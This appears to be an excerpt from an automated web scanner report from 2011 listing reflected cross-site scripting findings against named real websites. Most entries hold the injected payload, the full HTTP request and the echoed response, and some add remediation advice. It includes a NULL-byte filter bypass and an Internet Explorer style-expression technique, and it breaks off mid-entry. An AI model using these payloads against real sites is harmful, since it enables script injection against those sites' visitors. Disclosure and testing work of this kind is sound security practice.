The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2e7e<a>4be5b3a2cd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/Zedo1AEb2e7e<a>4be5b3a2cd7/AudienceSelect/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eafa6<a>4caa897812 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/Zedo1AE/AudienceSelecteafa6<a>4caa897812/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "zedo1ae"; t.adSpace = "audienceselecteafa6<a>4caa897812"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload %00af77a%3balert(1)//f494e559d40 was submitted in the cb parameter. This input was echoed as af77a;alert(1)//f494e559d40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae2f0%3balert(1)//6b60ca83c9 was submitted in the cb parameter. This input was echoed as ae2f0;alert(1)//6b60ca83c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var oo_profile={ tokenType : "0", tracking : "", tags : "Education,Beauty,Dating and Relationships,Travel and Tourism High Affinity,Travel and Tourism,Swing Voters", tagcloud : [ { ta ...[SNIP]... 2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"} ] };
4.758. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv ...[SNIP]...
4.759. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload c98d3<script>alert(1)</script>b11dcabd3ff was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ff¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Mon, 28-Feb-2011 01:39:39 GMT; Path=/ Set-Cookie: er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:39 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:39:39 GMT Connection: close Server: eyeReturn Ad Serveri 6 Content-Length: 14948
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke ...[SNIP]... 3';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ffhttp://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_DOCKIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum ...[SNIP]...
The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload 9f1ff<script>alert(1)</script>6eb75e1cdc4 was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAA7ggAAEAAByjAwADuCAAAQAA"; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:47 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:39:47 GMT Connection: close Server: eyeReturn Ad Serveri 6 Content-Length: 14839
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke ...[SNIP]... 4';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4http://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_BBQIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum= ...[SNIP]...
The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d17"><script>alert(1)</script>6e51300229e was submitted in the uid parameter. This input was echoed as 95d17\"><script>alert(1)</script>6e51300229e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?uid=42b39fdb198522d2bfc6b1f64cd9836595d17"><script>alert(1)</script>6e51300229e HTTP/1.1 Host: widgets.mobilelocalnews.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:39:50 GMT Server: Apache Content-Type: text/html Content-Length: 8345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> M ...[SNIP]... <input type="hidden" id="userid" name="userid" value="42b39fdb198522d2bfc6b1f64cd9836595d17\"><script>alert(1)</script>6e51300229e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df18b<script>alert(1)</script>803ab7018bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpdf18b<script>alert(1)</script>803ab7018bd HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 29 Jan 2011 02:03:23 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=uqvune1puuutljd0ma17l7lng6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpdf18b<script>alert(1)</script>803ab7018bd</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e5f"-alert(1)-"65114331d2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php63e5f"-alert(1)-"65114331d2d HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 29 Jan 2011 02:03:23 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=1ndjvr1kahoqlol8igujp0dtv0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php63e5f"-alert(1)-"65114331d2d"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.765. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f922a"-alert(1)-"ab5ad896ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/f922a"-alert(1)-"ab5ad896ba9 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/f922a"-alert(1)-"ab5ad896ba9"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 was submitted in the v parameter. This input was echoed as c5b14"style="x:expression(alert(1))"5b81dfd1d34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=20c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-20c5b14"style="x:expression(alert(1))"5b81dfd1d34" /> ...[SNIP]...
4.767. http://www.berkshireeagle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.berkshireeagle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ba9"><script>alert(1)</script>7e6d2fe4b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f0ba9"><script>alert(1)</script>7e6d2fe4b4=1 HTTP/1.1 Host: www.berkshireeagle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca6f"-alert(1)-"c91e5761538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:fca6f"-alert(1)-"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393099708.1261781325.2487813376; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:06:01 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31117 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld03 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:fca6f"-alert(1)-"c91e5761538"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:fca6f\"-alert(1)-\"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 989c3</script><script>alert(1)</script>1b58c94f716 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240312844.2536784205.3019310080; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:06:03 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm03 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video"; s_265.linkInternal ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85a57</script><script>alert(1)</script>5ec905f2ca9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*85a57</script><script>alert(1)</script>5ec905f2ca9/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.2587377997.113116416; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:06:04 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31109 Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 585c5</script><script>alert(1)</script>6640b326e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com585c5</script><script>alert(1)</script>6640b326e5/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.4164436301.809108992; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:06:05 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31108 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75dbe</script><script>alert(1)</script>1dc14cd4469 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469 HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240312844.2536784205.3338077184; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:06:07 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm03 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... |http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469"; s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afcc"><script>alert(1)</script>d82b4897c0c was submitted in the REST URL parameter 5. This input was echoed as 4afcc\"><script>alert(1)</script>d82b4897c0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
